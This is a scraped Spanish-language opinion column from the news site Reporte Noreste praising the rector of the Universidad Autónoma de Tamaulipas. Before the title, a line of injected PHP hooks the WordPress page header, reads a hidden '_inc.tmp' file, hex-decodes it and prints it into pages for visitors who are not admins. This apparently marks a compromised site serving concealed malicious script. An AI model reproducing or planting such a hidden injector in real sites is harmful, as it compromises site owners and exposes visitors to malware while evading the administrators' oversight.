if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Capítulos inconclusos – Reporte Noreste
Conéctate con nosotros

Opinión

Capítulos inconclusos

Capítulos inconclusos

Hay episodios en la vida que nadie por más que se esfuerce va a entender. La Universidad Autónoma de Tamaulipas (UAT), llevaba años sometida, así como secuestrada por un grupúsculo oscuro infiltrado en la sociedad.

Nada ha sido facil, bueno, muchos de los que ahora regresan a GobTam saben de lo que hablamos, ellos, muchos salieron corriendo atemorizados de Tamaulipas, los menos o los más no pudieron con los bombazos de dinero que les dieron para fortalecer el silencio y la omisión que sometía a los tamaulipecos; hoy regresan victoriosos.

En el Campus Tampico-Madero de la UAT, se vivieron cosas muy feas, incluso la academia de Tamaulipas llevara por siempre en su historia la desaparición de uno de sus directores, incluso mucha de su extensión territorial estaba bajo el dominio de personas ajenas a los estudios, por fortuna Guillermo Mendoza ha venido trabajando duro con sus directores y los resultados comienzan a notarse.

Si bien es cierto que los avances no todos depende de él, mucho tiene que ver desde sus funciones como encargado de finanzas de la UAT,  y hoy como rector se remarca su cercanía con los directores, como por ejemplo, con la Master Elda Ruth de los Reyes Villarreal, con quien viene trabajando para que a la brevedad después de más de una década la Facultad de Derecho en el Campus Tampico Madero recupere su mítica cafetería, eso va a ser una realidad en el nuevo comienzo de la UAT.

Las alianzas y estrecha colaboración de Guillermo Mendoza se reflejan también en Ciudad Victoria, donde reconoció la trayectoria académica de la Facultad de Comercio donde llevó a cabo la ceremonia conmemorativa del quincuagésimo quinto aniversario de su fundación donde destacó que esta es una de las instituciones de la UAT con mayor demanda, y que goza de un gran prestigio al ofertar programas educativos de licenciatura y posgrado acreditados a nivel nacional.

En la intimidad… Busque en internet la intervención de la senadora priísta Claudia Ruíz, vale la pena escuchar cómo se dirige y la justificación de motivos respecto a su voto durante el debate de la reforma militar.

Hágame caso por fis

davidcastellanost@hotmail.com
@dect1608

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Opinión